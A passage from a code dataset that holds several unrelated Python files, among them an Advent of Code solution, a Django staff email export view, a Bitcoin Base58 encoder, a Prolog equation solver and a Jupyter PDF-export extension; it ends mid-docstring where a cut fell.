content stringlengths 5 1.05M |
|---|
"""
Leia uma frase qualquer e diga se ela é um palíndromo
UMA FORMA SEM O FOR
inverso = junto[::-1]
"""
frase = str(input('Digite uma frase qualquer: ')).strip()
div = frase.split()
junto = ''.join(div) # junção das palavras
inverso = ''
for letra in range(len(junto) - 1, -1, -1):
inverso += junto[letra]
if inverso == junto:
print("É um palíndromo")
else:
print('Não é um palíndromo') |
from django.http import HttpResponse
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth import get_user_model
from django.utils import formats
import csv
import itertools
User = get_user_model()
def csv_out(qs, headers, row_export_func, file_name='export'):
""" Export queryset as a CSV response
:param qs: queryset to output
:param headers: list of CSV headers
:param row_export_func: returns a list of data attrs to export per object/qdict
:param file_name: a filename this CSV will download as
:return: a response with CSV data that will save as a download
"""
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = f'attachment; filename="{file_name}.csv"'
writer = csv.writer(response)
writer.writerow(headers)
for u in qs.iterator():
writer.writerow(row_export_func(u))
return response
def export_emails(filters, file_name='export-email'):
qs = User.objects.filter(**filters).order_by('-id')
headers = ['User ID', 'Date joined',
'Email Address', 'First Name', 'Last Name']
def row_export_func(u):
return [u.id, formats.date_format(u.date_joined, "SHORT_DATETIME_FORMAT"),
u.email, u.first_name, u.last_name]
return csv_out(qs, headers, row_export_func, file_name=file_name)
@staff_member_required
def email_export(request, filters={}):
return export_emails(filters)
|
import csv
import gzip
from pathlib import Path
from rich.console import Console
from typing import Union, List, Iterator
SENTIMENT_CLASS_VALUES = ['POSITIVE', 'NEGATIVE']
PRODUCT_CATEGORIES = ['Kitchen', 'DVD', 'Books', 'Electronics']
CORPUS_SIZE = 5600
console = Console()
__general_download_message__ = """Ensure that you have properly downloaded categorized product sentiment corpus using
python -m sadedegel.dataset.tweet_sentiment download --access-key xxx --secret-key xxxx
Unfortunately due to data licensing issues we could not share data publicly.
Get in touch with sadedegel team to obtain a download key.
"""
def check_directory_structure(path: str) -> bool:
base_dir = Path(path).expanduser()
cat_prod_sentiment_dir = base_dir / 'categorized_product_sentiment'
if not base_dir.exists():
console.log(f"Dataset base directory ([bold red]{base_dir}[/bold red]) does not exist")
elif not cat_prod_sentiment_dir.exists():
console.log(
f"Tweet sentiment directory ([bold red]{cat_prod_sentiment_dir}[/bold red]) does not exist")
else:
return True
console.log(__general_download_message__)
return False
def load_categorized_product_sentiment_train(data_home="~/.sadedegel_data",
categories: Union[None, List[str], str] = None) -> Iterator[dict]:
"""
@param data_home: Sadedegel data directory base. Default to be ~/.sadedegel_data
@param categories:
If None (default), load all the categories.
If not None, list of category names (or a single category) to load (other categories
ignored).
@return: Iterator of dictionary
"""
if not check_directory_structure(data_home):
raise Exception("Categorized Product Corpus validation error")
train_csv = Path(data_home).expanduser() / "categorized_product_sentiment"
train_csv = train_csv / "categorized_product_sentiment.csv.gz"
if categories is None:
filtered_categories = PRODUCT_CATEGORIES
elif isinstance(categories, str):
filtered_categories = [categories]
elif isinstance(categories, list):
filtered_categories = categories
else:
raise ValueError(f"categories of type {type(categories)} is invalid.")
with gzip.open(train_csv, "rt") as csvfile:
rd = csv.DictReader(csvfile)
for rec in rd:
d = dict(id=rec['text_uuid'], text=rec['text'],
product_category=PRODUCT_CATEGORIES.index(rec['category']),
sentiment_class=SENTIMENT_CLASS_VALUES.index(rec['sentiment_class']))
if rec['category'] in filtered_categories:
yield d
|
# ---------------------------------------------------------------------------------------------------------------------
# AoC 2021
# ---------------------------------------------------------------------------------------------------------------------
# 18.py
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------------------------------------------------
import math
# ---------------------------------------------------------------------------------------------------------------------
def add(x: str, y: str) -> str:
return "[%s,%s]" % (x, y)
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_explode_left(s: str, sl: int) -> str:
s_left, s_mid, s_right = s, "", ""
while len(s_left) > 0 and not s_left[-1].isdigit():
s_right = s_left[-1] + s_right
s_left = s_left[: -1]
if not s_left:
return s_right
while s_left[-1].isdigit():
s_mid = s_left[-1] + s_mid
s_left = s_left[: -1]
return s_left + str(int(s_mid) + sl) + s_right
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_explode_right(s: str, sr: int) -> str:
s_left, s_mid, s_right = "", "", s
while len(s_right) > 0 and not s_right[0].isdigit():
s_left = s_left + s_right[0]
s_right = s_right[1:]
if not s_right:
return s_left
while s_right[0].isdigit():
s_mid = s_mid + s_right[0]
s_right = s_right[1:]
return s_left + str(int(s_mid) + sr) + s_right
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_explode(s: str) -> str:
s_left, s_mid, s_right = "", "", ""
num_opened, num_closed = 0, 0
for i in range(len(s)):
c = s[i]
if c == '[':
num_opened += 1
elif c == ']':
num_closed += 1
if num_opened - num_closed < 5:
if s_mid == "":
s_left += c
else:
s_mid += c
s_right = s[i + 1:]
sl, sr = [int(t) for t in s_mid[1: -1].split(',')]
s_left = reduce_explode_left(s_left, sl)
s_right = reduce_explode_right(s_right, sr)
return s_left + "0" + s_right
if num_opened - num_closed == 5:
s_mid += c
return s
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce_split(s: str) -> str:
i = 0
while True:
while not s[i].isdigit():
i += 1
if i == len(s):
return s
j = i + 1
while s[j].isdigit():
j += 1
sd = int(s[i:j])
if sd >= 10:
return s[:i] + ("[%s,%s]" % (math.floor(sd / 2), math.ceil(sd / 2))) + s[j:]
i += 1
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def reduce(s0: str) -> str:
s1 = s0
while True:
s2 = reduce_explode(s1)
if s2 != s1:
# print("after explode: %s" % s2)
s1 = s2
continue
s3 = reduce_split(s2)
if s3 == s1:
return s1
# print("after split: %s" % s3)
s1 = s3
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def magnitude(s: str) -> int:
num_opened, num_closed = 1, 0
for i in range(1, len(s)):
c = s[i]
if c == '[':
num_opened += 1
elif c == ']':
num_closed += 1
elif c == ',':
if num_opened - num_closed == 1:
x = s[1: i]
y = s[i + 1: -1]
x_val = magnitude(x) if ',' in x else int(x)
y_val = magnitude(y) if ',' in y else int(y)
return 3 * x_val + 2 * y_val
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
def main() -> None:
with open('input.txt') as f:
numbers = [t.strip() for t in f.readlines()]
s = ""
for n in numbers:
if not s:
s = n
else:
s = reduce(add(s, n))
# print("after addition: %s" % s)
print("part 1: %s" % magnitude(s))
m_max = 0
for i in range(len(numbers)):
for j in range(len(numbers)):
if i == j:
continue
s = reduce(add(numbers[i], numbers[j]))
s = reduce(s)
m = magnitude(s)
if m > m_max:
m_max = m
print("part 2: %d" % m_max)
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
main()
# ---------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------------------------------------------------------------
# End of File
# ---------------------------------------------------------------------------------------------------------------------
|
'''
Created on 2015-01-16
@author: levi
'''
from pyswip import Prolog
from attribute_equation_solver import AttributeEquationSolver
class PrologAttributeEquationEvaluator(AttributeEquationSolver):
"""
Simple constraint solver based on prolog for string equations in path conditions.
Requires pyswip, a bridge between python and prolog to be installed.
For information on how to install pyswip see: https://code.google.com/p/pyswip/
"""
# to generate fresh var ID names
varID = 0
# Keep the variable names in the prolog expression for all attributes of the same
# name connected to the same object. This is necessary because an object may have connected
# to it more than one attribute with the same name, which means the attribute has multiple
# constraints for that object.
varNameDatabase = {}
def __init__(self, verbosity):
self.verbosity = verbosity
def newVarID(self):
old_varID = self.varID
self.varID += 1
return "V" + str(old_varID)
# def build_equation_expression(self, node, pathCondition, variablesInExpression, concatsInExpression):
# """
# helper for building the attribute equations by recursively going through the operations associated
# to the left hand side and to the right hand side of an equation
# """
#
# # in case it's an attribute, return the object's ID
# if pathCondition.vs[node]['mm__'] == 'Attribute':
# variablesInExpression.append("X" + str(node))
# return "X" + str(node)
# # in case it's a constant, return its value as a list
# elif pathCondition.vs[node]['mm__'] == 'Constant':
# constant = pathCondition.vs[node]['name']
# print "------> " + constant
# constAsList = "["
# for c in range(0,len(constant)):
# constAsList += "'" + constant[c] + "'"
# if c < len(constant) - 1:
# constAsList += ","
# constAsList += "]"
# return constAsList
# # it's a concat operation
# else:
# # get the arguments of the concat operation
# arg1Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][0]
# arg2Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][0]
# arg1 = pathCondition.neighbors(arg1Edge,1)[0]
# arg2 = pathCondition.neighbors(arg2Edge,1)[0]
# newVar = self.newVarID()
#
# # add the concat operation to the set of append predicates in the body of the rule
# concatsInExpression.append("append(" + self.build_equation_expression(arg1, pathCondition, variablesInExpression, concatsInExpression) + "," + self.build_equation_expression(arg2, pathCondition, variablesInExpression, concatsInExpression) + "," + newVar + ")")
#
# # return the newly created variable
# return newVar
# def __call__(self, pathCondition):
# """
# Evaluates attribute equations by producing a Prolog predicate out of them and attempting to find a solution for that predicate.
# The predicate has as arguments the attributes of the path condition for which a solution needs to exist such that the path condition is possible.
# If a solution is found then the evaluator returns true, otherwise false.
# """
#
# clauseBody = ""
# variablesInExpression = []
# concatsInExpression = []
#
# # grab all the equation nodes in the path condition
# equationNodes = self._find_nodes_with_mm(pathCondition, "Equation")
# # now build all the equations
# if equationNodes != []:
# for equationNode in range(0,len(equationNodes)):
# # get the left and the right expressions of the equation
# leftExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'leftExpr'][0]
# rightExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'rightExpr'][0]
#
# leftExprNode = pathCondition.neighbors(leftExprEdge,1)[0]
# rightExprNode = pathCondition.neighbors(rightExprEdge,1)[0]
#
# leftExpr = self.build_equation_expression(leftExprNode, pathCondition, variablesInExpression, concatsInExpression)
# rightExpr = self.build_equation_expression(rightExprNode, pathCondition, variablesInExpression, concatsInExpression)
#
# if equationNode < len(equationNodes)-1:
# clauseBody += leftExpr + "=" + rightExpr + ","
# else:
# clauseBody += leftExpr + "=" + rightExpr
#
# if concatsInExpression != []:
# clauseBody += ","
# for concat in concatsInExpression:
# clauseBody += concat
#
# clauseHead = "solve("
# # variablesInExpression = list(set(variablesInExpression))
# for var in range(0,len(variablesInExpression)):
# if var < len(variablesInExpression)-1:
# clauseHead += variablesInExpression[var] + ","
# else:
# clauseHead += variablesInExpression[var]
# clauseHead += ")"
#
# prologInput = clauseHead + ":-" + clauseBody
#
# if self.verbosity >= 2 :
# print "\nChecking with Prolog:"
# print "----------------"
# print prologInput
# print "\n"
#
# p = Prolog()
# p.assertz(prologInput)
# # l = list(p.query(clauseHead))
#
# print "Clause head: " + clauseHead
# result = list(p.query(clauseHead))
# print "Prolog result:"
# print result
#
# if result == []:
# if self.verbosity >= 2 : print "Prolog check failed!"
# return False
# else:
# if self.verbosity >= 2 : print "Prolog check succeeded!"
# return True
def build_equation_expression(self, node, pathCondition, variablesInExpression, concatsInExpression, varParentObjects):
"""
helper for building the attribute equations by recursively going through the operations associated
to the left hand side and to the right hand side of an equation
"""
# in case it's an attribute, return the object's ID
if pathCondition.vs[node]['mm__'] == 'Attribute':
# get the parent object of the attribute
attrEdgeMatch = [i for i in pathCondition.neighbors(node,2) if pathCondition.vs[i]['mm__'] == 'hasAttribute_S']
attrEdgeApply = [i for i in pathCondition.neighbors(node,2) if pathCondition.vs[i]['mm__'] == 'hasAttribute_T']
if attrEdgeMatch != []:
parentObject = pathCondition.neighbors(attrEdgeMatch[0],2)[0]
else:
parentObject = pathCondition.neighbors(attrEdgeApply[0],2)[0]
# check if a variable for an attribute having the same name and belonging to the same object has already been created
# and in case it has just return it, otherwise create a new variable
attrName = pathCondition.vs[node]['name']
varDatabaseKey = str(parentObject) + attrName
if not varDatabaseKey in set(self.varNameDatabase.keys()):
self.varNameDatabase[varDatabaseKey] = "X" + str(node)
variablesInExpression.append(self.varNameDatabase[varDatabaseKey])
return self.varNameDatabase[varDatabaseKey]
else:
variablesInExpression.append(self.varNameDatabase[varDatabaseKey])
return self.varNameDatabase[varDatabaseKey]
# in case it's a constant, return its value as a list
elif pathCondition.vs[node]['mm__'] == 'Constant':
constant = pathCondition.vs[node]['name']
constAsList = "["
for c in range(0,len(constant)):
constAsList += "'" + constant[c] + "'"
if c < len(constant) - 1:
constAsList += ","
constAsList += "]"
return constAsList
# it's a concat operation
else:
# get the arguments of the concat operation
arg1Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][0]
arg2Edge = [i for i in pathCondition.neighbors(node,1) if pathCondition.vs[i]['mm__'] == 'hasArgs'][1]
arg1 = pathCondition.neighbors(arg1Edge,1)[0]
arg2 = pathCondition.neighbors(arg2Edge,1)[0]
newVar = self.newVarID()
# add the concat operation to the set of append predicates in the body of the rule
concatsInExpression.append("append(" + self.build_equation_expression(arg1, pathCondition, variablesInExpression, concatsInExpression, varParentObjects) + "," + self.build_equation_expression(arg2, pathCondition, variablesInExpression, concatsInExpression, varParentObjects) + "," + newVar + ")")
# return the newly created variable
return newVar
def __call__(self, pathCondition):
"""
Evaluates attribute equations by producing a Prolog predicate out of them and attempting to find a solution for that predicate.
The predicate has as arguments the attributes of the path condition for which a solution needs to exist such that the path condition is possible.
If a solution is found then the evaluator returns true, otherwise false.
"""
clauseBody = ""
variablesInExpression = []
concatsInExpression = []
varParentObjects = []
# grab all the equation nodes in the path condition
equationNodes = self._find_nodes_with_mm(pathCondition, "Equation")
# now build all the equations
if equationNodes != []:
for equationNode in range(0,len(equationNodes)):
# get the left and the right expressions of the equation
leftExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'leftExpr'][0]
rightExprEdge = [i for i in pathCondition.neighbors(equationNodes[equationNode],1) if pathCondition.vs[i]['mm__'] == 'rightExpr'][0]
leftExprNode = pathCondition.neighbors(leftExprEdge,1)[0]
rightExprNode = pathCondition.neighbors(rightExprEdge,1)[0]
leftExpr = self.build_equation_expression(leftExprNode, pathCondition, variablesInExpression, concatsInExpression, varParentObjects)
rightExpr = self.build_equation_expression(rightExprNode, pathCondition, variablesInExpression, concatsInExpression, varParentObjects)
if equationNode < len(equationNodes)-1:
clauseBody += leftExpr + "=" + rightExpr + ","
else:
clauseBody += leftExpr + "=" + rightExpr
for concat in concatsInExpression:
clauseBody += ","
clauseBody += concat
clauseHead = "solve("
# variablesInExpression = list(set(variablesInExpression))
for var in range(0,len(variablesInExpression)):
if var < len(variablesInExpression)-1:
clauseHead += variablesInExpression[var] + ","
else:
clauseHead += variablesInExpression[var]
clauseHead += ")"
prologInput = clauseHead + ":-" + clauseBody
if self.verbosity >= 2 :
print "\nChecking with Prolog:"
print "----------------"
print prologInput
print "\n"
p = Prolog()
p.assertz(prologInput)
# l = list(p.query(clauseHead))
if self.verbosity >= 2 :
print "Clause head: " + clauseHead
result = list(p.query(clauseHead))
print "Prolog result: " + str(result)
if result == []:
if self.verbosity >= 2 : print "Prolog check failed!"
return False
else:
if self.verbosity >= 2 : print "Prolog check succeeded!"
return True
def _find_nodes_with_mm(self, graph, mm_names):
"""
Find all objects of a given type in a rules having theur type name in the mm_names set.
TODO: move this method to the himesis_utils file, together with the one from PyRamify
"""
nodes = []
for node in graph.vs:
if node["mm__"] in mm_names:
nodes.append(node)
return nodes
|
import hashlib
import sys
# 58 character alphabet used
BASE58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
# code reference url:https://www.cnblogs.com/zhaoweiwei/p/address.html
def from_bytes (data, big_endian = False):
if isinstance(data, str):
data = bytearray(data)
if big_endian:
data = reversed(data)
num = 0
for offset, byte in enumerate(data):
num += byte << (offset * 8)
return num
def base58_encode(version, public_address):
"""
Gets a Base58Check string
See https://en.bitcoin.it/wiki/Base58Check_encoding
"""
if sys.version_info.major > 2:
version = bytes.fromhex(version)
else:
version = bytearray.fromhex(version)
firstSHA256 = hashlib.sha256(version + public_address)
secondSHA256 = hashlib.sha256(firstSHA256.digest())
checksum = secondSHA256.digest()[:4]
payload = version + public_address + checksum
if sys.version_info.major > 2:
result = int.from_bytes(payload, byteorder="big")
else:
result = from_bytes(payload, True)
# count the leading 0s
padding = len(payload) - len(payload.lstrip(b'\0'))
encoded = []
while result != 0:
result, remainder = divmod(result, 58)
encoded.append(BASE58_ALPHABET[remainder])
return padding*"1" + "".join(encoded)[::-1]
def get_public_address(public_key):
hash_addr = hashlib.sha256(public_key).digest()
h = hashlib.new('ripemd160')
h.update(hash_addr)
public_address = h.digest()
#print("RIPEMD-160: %s"%h.hexdigest().upper())
return public_address
def script_asm_to_non_standard_address(script_asm):
#public key to bitcoin address
public_key = bytearray.fromhex(script_asm.split(" ")[0])
public_address = get_public_address(public_key)
address = base58_encode("00", public_address)
"""
script_bytes = bytearray.fromhex(script_hex)
script_hash = hashlib.sha256(script_bytes).hexdigest()[:40]
address = 'nonstandard' + script_hash
"""
return address
|
# Copyright 2018-2020 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""
This module contains optimizers for the standard :mod:`QNode` class, which uses the NumPy interface.
"""
# Python optimizers that are available in PennyLane
# listed in alphabetical order to avoid circular imports
from .adagrad import AdagradOptimizer
from .adam import AdamOptimizer
from .gradient_descent import GradientDescentOptimizer
from .momentum import MomentumOptimizer
from .nesterov_momentum import NesterovMomentumOptimizer
from .rms_prop import RMSPropOptimizer
from .qng import QNGOptimizer
from .rotosolve import RotosolveOptimizer
from .rotoselect import RotoselectOptimizer
# Optimizers to display in the docs
__all__ = [
"AdagradOptimizer",
"AdamOptimizer",
"GradientDescentOptimizer",
"MomentumOptimizer",
"NesterovMomentumOptimizer",
"RMSPropOptimizer",
"QNGOptimizer",
"RotosolveOptimizer",
"RotoselectOptimizer",
]
|
import re
pattern = r"(.+) \1"
"""Note, that "(.+) \1" is not the same as "(.+) (.+)", because \1 refers to
the first group's subexpression, which is the matched expression itself, and
not the regex pattern."""
match = re.match(pattern, "word word")
if match:
print("Match 1")
print(match.group(1))
print(match.group())
match = re.match(pattern, "?! ?!")
if match:
print("Match 2")
print(match.group(1))
print(match.group())
match = re.match(pattern, "abc cde")
if match:
print("Match 3")
print(match.group(1))
print(match.group())
pattern = r"(.+) (.+) (.+) \1"
match = re.match(pattern, "abc bca cab abc") # \1 represent abc
if match:
print("Match 1-1")
match = re.match(pattern, "abc bca cab bca")
if match:
print("Match 1-2")
match = re.match(pattern, "abc bca cab cab")
if match:
print("Match 1-3")
pattern = r"(.+) (.+) (.+) \2"
match = re.match(pattern, "abc bca cab abc")
if match:
print("Match 2-1")
match = re.match(pattern, "abc bca cab bca") # \2 represent bca
if match:
print("Match 2-2")
match = re.match(pattern, "abc bca cab cab")
if match:
print("Match 2-3")
pattern = r"(.+) (.+) (.+) \3"
match = re.match(pattern, "abc bca cab abc")
if match:
print("Match 3-1")
match = re.match(pattern, "abc bca cab bca")
if match:
print("Match 3-2")
match = re.match(pattern, "abc bca cab cab") # \3 represent cab
if match:
print("Match 3-3")
|
from unittest import TestCase
import pandas as pd
from exchange_calendars.extensions.exchange_calendar_krx import KRXExchangeCalendar
class KRXCalendarTestCase(TestCase):
MAX_SESSION_HOURS = 8.5
def test_2017_holidays(self):
# lunar new years: jan 27, 30
# independence day: mar 1
# labor day: may 1
# buddhas birthday: may 3
# children's day: may 5
# president: may 9
# memorial day: jun 6
# liberation day: aug 15
# substitution holiday: oct 2
# harvest mood day: oct, 3, 4, 5, 6
# hangul proclamation day: oct 9
# christmas :dec 25
# end year closing: dec 29
self.calendar = KRXExchangeCalendar()
for day in ['2017-01-27', '2017-01-30', '2017-03-01', '2017-05-01', '2017-05-03',
'2017-05-05', '2017-05-09', '2017-06-06', '2017-08-15', '2017-10-02',
'2017-10-03', '2017-10-04', '2017-10-05', '2017-10-06', '2017-10-09',
'2017-12-25', '2017-12-29']:
self.assertFalse(self.calendar.is_session(pd.Timestamp(day, tz='UTC')))
|
import media
import fresh_tomatoes
""" Instances consist of 4 arguments each that are passed into the
module media.py and uses its class Movie """
# 6 instances that calls __init__ method in the module media.py
star_wars = media.Movie(
"Star Wars",
"A story of a boy a girl and the universe",
# NOQA - URL breaks PEP8 Standards but cant break line to fix
"https://tse2.mm.bing.net/th?id=OIP.W3-_kiSuMQ35EpfQmpCQoAHaKX&pid=15.1&P=0&w=300&h=300",
"https://youtube.com/tv#/watch?v=XHk5kCIiGoM")
the_sound_of_music = media.Movie(
"The Sound of Music",
# NOQA - URL breaks PEP8 Standards but cant break line to fix
"A Nun, Maria, becomes a Governess and much more for the Von Trapps.",
"https://tse1.mm.bing.net/th?id=OIP.OGX0qNsyvHh3O7j4JBvJYgHaLD&pid=15.1&P=0&w=300&h=300",
"https://youtube.com/tv#/watch?v=UY6uw3WpPzY")
transformers = media.Movie(
"The Transformers: The Movie(1986)",
"Autobots battle the Decepticons and Unicron",
"https://i.jeded.com/i/the-transformers-the-movie.31030.jpg",
"https://youtube.com/tv#/watch?v=VyGLiwGUjeM")
avengers = media.Movie(
"The Avengers",
"The Avengers battle Loki.",
# NOQA - URL breaks PEP8 Standards but cant break line to fix
"http://1.bp.blogspot.com/-p9FPICvPfqo/VdbMbDqbhDI/AAAAAAAAzrU/2BnrpuqkilQ/s1600/AvengersPoster4.jpg",
"https://youtube.com/tv#/watch?v=eOrNdBpGMv8")
wonder_woman = media.Movie(
"Wonder Woman",
"The Amazon searches the world for The God of War",
"https://hmssweblog.files.wordpress.com/2017/05/wonder-woman-poster.jpg",
"https://youtube.com/tv#/watch?v=VSB4wGIdDwo")
black_panther = media.Movie(
"The Black Panther",
"Wakanda stryggles to use their resources to help the world.",
# NOQA - URL breaks PEP8 Standards but cant break line to fix
"https://www.monkeysfightingrobots.com/wp-content/uploads/2017/10/Black-Panther-Poster.jpg",
"https://youtube.com/tv#/watch?v=xjDjIWPwcPU")
# Array placed in a variable
movies = [
star_wars,
the_sound_of_music,
transformers,
avengers,
wonder_woman,
black_panther]
# Calls the method inside the module fresh_tomatoes and places an argument
# into it
fresh_tomatoes.open_movies_page(movies)
|
eval_file = 'pred_eval.txt'
test_file = 'pred_test.txt'
with open("twitter-datasets/eval_data.txt", "r") as f:
labels = []
for line in f.readlines():
labels.append(int(line.strip().split(",")[0]))
with open(eval_file, "r") as f:
correct = 0
total = 0
for i, line in enumerate(f.readlines()):
label = int(line.strip()[-1])
if label == labels[i]:
correct += 1
total += 1
print("Eval acc", correct / float(total))
with open(test_file, 'r') as f:
with open(test_file + '.kaggle.csv', 'w') as w:
print('Id,Prediction', file=w)
for i, line in enumerate(f.readlines()):
label = 2 * int(line.strip()[-1]) - 1
print('{},{}'.format(i + 1, label), file=w)
|
"""Define a Jupyter Notebook extension to export Notebooks to PDF.
This module takes the selected Jupyter Notebook files and converts
them to a single PDF.
"""
import os
import io
from typing import List, Dict, TYPE_CHECKING, Union
from notebook.base.handlers import IPythonHandler, web, path_regex, FilesRedirectHandler
from notebook.nbconvert.handlers import _format_regex
from nbconvert import PDFExporter
from notebook.utils import url_path_join
from ipython_genutils import text
from pdfrw import PdfWriter, PdfReader
import thermohw
if TYPE_CHECKING:
from notebook.notebookapp import NotebookWebApplication # noqa: F401 (typing)
from ._version import __version__ # noqa: F401
thermohw_dir: str = os.path.abspath(os.path.dirname(thermohw.__file__))
def _jupyter_server_extension_paths() -> List[Dict[str, str]]:
return [{
"module": "convert_and_download"
}]
# Jupyter Extension points
def _jupyter_nbextension_paths() -> List[Dict[str, str]]:
return [dict(
section="tree",
# the path is relative to the `my_fancy_module` directory
src="static",
# directory in the `nbextension/` namespace
dest="convert_and_download",
# _also_ in the `nbextension/` namespace
require="convert_and_download/main")]
class DLConvertHandler(IPythonHandler):
"""Handle converting and downloading a set of Notebooks to PDF."""
SUPPORTED_METHODS = ('GET',)
@web.authenticated
def get(self, format: str, path: str):
"""Handle the GET method call."""
if format != 'pdf':
self.log.exception('format must be pdf')
raise web.HTTPError(500, 'format must be pdf')
self.config.PDFExporter.preprocessors = [thermohw.ExtractAttachmentsPreprocessor]
self.config.PDFExporter.template_file = os.path.join(thermohw_dir, 'homework.tpl')
self.config.PDFExporter.filters = {'convert_div': thermohw.convert_div,
'convert_raw_html': thermohw.convert_raw_html}
self.config.PDFExporter.latex_count = 1
exporter = PDFExporter(config=self.config, log=self.log)
exporter.writer.build_directory = '.'
pdfs = []
path = path.strip('/').strip()
paths = path.split('.ipynb')
for path in paths:
if not path:
continue
path += '.ipynb'
# If the notebook relates to a real file (default contents manager),
# give its path to nbconvert.
ext_resources_dir: Union[str, None]
basename: str
os_path: str
if hasattr(self.contents_manager, '_get_os_path'):
os_path = self.contents_manager._get_os_path(path)
ext_resources_dir, basename = os.path.split(os_path)
else:
ext_resources_dir = None
model: Dict[str, str] = self.contents_manager.get(path=path)
name: str = model['name']
if model['type'] != 'notebook':
# not a notebook, redirect to files
return FilesRedirectHandler.redirect_to_files(self, path)
nb = model['content']
self.set_header('Last-Modified', model['last_modified'])
# create resources dictionary
mod_date: str = model['last_modified'].strftime(text.date_format)
nb_title: str = os.path.splitext(name)[0]
config_dir: str = self.application.settings['config_dir']
resource_dict: Dict[str, str] = {
"metadata": {
"name": nb_title,
"modified_date": mod_date
},
"config_dir": config_dir,
}
if ext_resources_dir:
resource_dict['metadata']['path'] = ext_resources_dir
output: bytes
try:
output, _ = exporter.from_notebook_node(
nb,
resources=resource_dict
)
except Exception as e:
self.log.exception("nbconvert failed: %s", e)
raise web.HTTPError(500, "nbconvert failed: %s" % e)
pdfs.append(io.BytesIO(output))
writer = PdfWriter()
for pdf in pdfs:
writer.addpages(PdfReader(pdf).pages)
bio = io.BytesIO()
writer.write(bio)
bio.seek(0)
output = bio.read()
bio.close()
# Force download if requested
if self.get_argument('download', 'false').lower() == 'true':
filename = 'final_output.pdf'
self.set_header('Content-Disposition',
'attachment; filename="{}"'.format(filename))
# MIME type
if exporter.output_mimetype:
self.set_header('Content-Type',
'{}; charset=utf-8'.format(exporter.output_mimetype))
self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
self.finish(output)
def load_jupyter_server_extension(nb_server_app: 'NotebookWebApplication') -> None:
"""Call when the extension is loaded.
Args:
nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance.
"""
web_app = nb_server_app.web_app
host_pattern = '.*$'
# _format_regex = r"(?P<format>\w+)"
# path_regex = r"(?P<path>(?:(?:/[^/]+)+|/?))"
route_pattern = url_path_join(web_app.settings['base_url'],
r"/dlconvert/{fmt_regex}{path_regex}".format(
fmt_regex=_format_regex, path_regex=path_regex))
web_app.add_handlers(host_pattern, [(route_pattern, DLConvertHandler)])
|
from ..storage import source_utils
from ..storage.caching import cache
from .. import config
from .storage import FeatureConstructor
from ..storage import dataframe
from IPython.display import display
from glob import glob
import os
def preview(df, sizes=(2, 4, 6)):
"""
Applies function to heads of particular dataframe.
Example:
``` python
@preview(df, sizes=[5, 15])
def make_ohe_pclass(df):
...
```
"""
def __preview(function):
config.preview_call = 1
try:
for sz in sizes:
if isinstance(df, dataframe.DataFrame):
ktdf = dataframe.DataFrame(df.head(sz), df.train, df.encoders)
else:
ktdf = dataframe.DataFrame(df.head(sz), True, {})
# ktdf = dataframe.DataFrame(df.head(sz), True, {})
display(function(ktdf))
except Exception as e:
config.preview_call = 0
raise e
config.preview_call = 0
return __preview
def register(*args, cache_default=True):
"""
Registers function for further caching its calls and restoring source.
Example:
``` python
@register
def make_ohe_pclass(df):
...
```
"""
def __register(func):
# if source_utils.source_is_saved(func) and not source_utils.matches_cache(func):
if func.__name__ + '_fc' in cache.cached_objs() and source_utils.get_source(func) != cache.load_obj(func.__name__ + '_fc').source:
raise NameError("A function with the same name is already registered")
if func.__name__ + '_fc' in cache.cached_objs():
return cache.load_obj(func.__name__ + '_fc')
else:
functor = FeatureConstructor(func, cache_default)
cache.cache_obj(functor, functor.__name__ + '_fc')
return functor
if args:
function = args[0]
return __register(function)
else:
return __register
def deregister(name, force=False):
"""
Deletes sources and cached calls of a certain function.
Usage:
``` python
deregister('make_new_features')
deregister('make_new_features', force=True)
```
"""
confirmation = ''
fc_name = name + '_fc'
df_names = [df_name for df_name in cache.cached_dfs() if df_name.startswith(name + '__')]
if not force:
print("Are you sure you want to delete all these cached files?")
if fc_name in cache.cached_objs():
print(fc_name)
for df_name in df_names:
print(df_name)
print("To confirm please print full name of the function:")
confirmation = input()
if not force and confirmation != name:
print("Doesn't match")
return
if fc_name in cache.cached_objs():
print(f'removing {fc_name}')
cache.remove_obj(fc_name)
for df_name in df_names:
print(f'removing {df_name}')
cache.remove_df(df_name)
def dropper(function):
"""
Registers function that won't be cached.
Is recommended to be used only with functions which actually drop columns or rows and don't produce any new data.
Example:
``` python
@dropper
def drop_pclass(df):
